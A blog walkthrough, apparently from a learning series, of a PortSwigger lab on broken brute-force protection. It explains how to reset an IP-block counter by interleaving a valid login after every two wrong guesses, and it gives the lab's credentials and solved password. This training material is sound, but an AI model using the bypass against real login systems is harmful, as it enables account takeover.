Learning Web-Sec — Day 12 - Authentication Vulnerabilities
Broken Brute-Force Protection, IP Block - PortSwigger Lab
Follow me for more such content as it keeps me motivated for writing such detailed walk-throughs.
Lab 4 - Broken brute-force protection, IP block
Level: Practitioner
Description of Lab:
This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim’s password, then log in and access their account page.
Your credentials:
wiener:peterVictim’s username:
carlos
Let’s first see what response we get when we try wrong and right username.
From this we can conclude that we can get valid usernames using username enumeration.
After 3 Invalid login attempts, our IP address gets blocked. And we need to wait for 1 minute for attempting the login again. Also you can try the technique we used for bypassing IP address brute-force protection and let me know if it works.
With further trial and error, We find that we need every 3rd correct login attempt resets the counter of blocking the IP address.
So, Let’s think of a way for using this into a terminal.
Algorithm:
1. Try the password at line i
2. Try the password at line i+1
3. Log in with the right credentials
And continue this till all the passwords are tried
This is the logic I could think of. You can do it any other way you like too. Also, if you pay close attention to the description, We’re already provided with the victim’s username.
And from the responses, We can surely say that the password is ‘batman’, Let’s now try logging in.
And Boom!
